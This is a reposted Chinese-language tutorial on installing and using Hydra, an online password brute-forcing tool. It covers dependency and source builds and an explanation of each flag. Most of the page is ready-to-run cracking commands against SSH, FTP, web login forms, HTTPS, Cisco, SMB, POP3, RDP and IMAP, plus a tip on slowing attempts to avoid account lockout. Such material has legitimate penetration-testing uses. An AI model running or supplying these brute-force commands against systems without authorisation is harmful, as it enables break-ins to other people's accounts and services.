碼上快樂

相關內容    簡體    繁體

Linux下的暴力密碼在線破解工具Hydra安裝及其組件安裝-使用

本文轉載自   查看原文   2016-11-08 22:07   1984 

Linux下的暴力密碼在線破解工具Hydra安裝及其組件安裝-使用
hydra可以破解:

http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等類型密碼。

如果是Debian和Ubuntu發行版,源里自帶hydra,直接用apt-get在線安裝:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

如果是Redhat/Fedora發行版的下載源碼包編譯安裝,先安裝相關依賴包:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

hydra其他安裝方法:

cmake安裝:

下載地址: http://www.cmake.org/files/v2.8/cmake-2.8.3.tar.gz

tar xzvf cmake-2.8.3.tar.gz

cd cmake-2.8.3

./bootstrap

make

make install

安裝完 使用時候如果出現: -cmake : command not found

make 安裝在了那個目錄下就執行下面PATH命令: 安裝在/tmp/目錄下:就執行: export PATH=/tmp/cmake-2.8.3/bin:$PATH

首先必須先安裝hydra組建libssh:

cd /usr/local/src
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install

(1)然后安裝新版hydra-7.3

cd /usr/local/src

wget http://www.thc.org/releases/hydra-7.3.tar.gz
tar zxvf hydra-7.3.tar.gz
cd hydra-7.3
./configure
make
make install

問題解決:

1使用hydra破解ssh報錯 hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory hydra無法找到libssh.so.4 ,所有我們就得手工添加進去。

export LD_LIBRARY_PATH=/usr/local/src/libssh-0.4.8/build/libssh/:$LD_LIBRARY_PATH 不過這個只能臨時添加。 更換SSH窗口即失效,需要重新添加。

(2) 如果以上版本hydra-7.3無法使用,再用下面這個。

cd /usr/local/src
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install

參數說明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 繼續從上一次進度接着破解。
-S 采用SSL鏈接。
-s PORT 可通過這個參數指定非默認端口。
-l LOGIN 指定破解的用戶,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是采用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f 在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認為16。
-w TIME 設置最大超時的時間,單位秒,默認是30s。
-v / -V 顯示詳細過程。
server 目標ip
service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可選項

1、破解ssh:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交,破解web登錄:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登錄:

hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=USER&password=PASS&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=USER&passwd=PASS:wrong username or password"

(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,中的內容是表示錯誤猜解的返回信息提示。)</p>

5、破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:

hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

使用示例:

hydra -L user.txt -P pwd.txt -o tmp -vV 192.168.1.10 ssh  //不使用默認帳號密碼。使用指定的帳號密碼,破解指定IP的SSH 22端口,輸出詳細信息-vV(一般我選擇不輸出信息,太多了)。輸出到tmp文件。

hydra -L user.txt -P pwd.txt -t 1 -o tmp -vV 192.168.1.10 ssh //默認的破解速度如果很快,常常被對方鎖掉。造成Error: could not connect to target port 22 等錯誤信息。 所以使用-t 1線程。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 暴力密碼破解工具 Hydra Linux下暴力破解工具Hydra詳解 Linux下暴力破解工具Hydra詳解 Linux 密碼的暴力破解 暴力破解( Hydra | Medusa) 初試在線破解工具Hydra爆破3389服務器 kali上密碼工具使用例如mudusa,hydra等 linux下使用denyhosts防止ssh暴力破解 【DVWA(三)】暴力破解 & burpsuite 的簡單使用(抓包暴力破解登錄密碼) hydra安裝及破解rdp方法
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM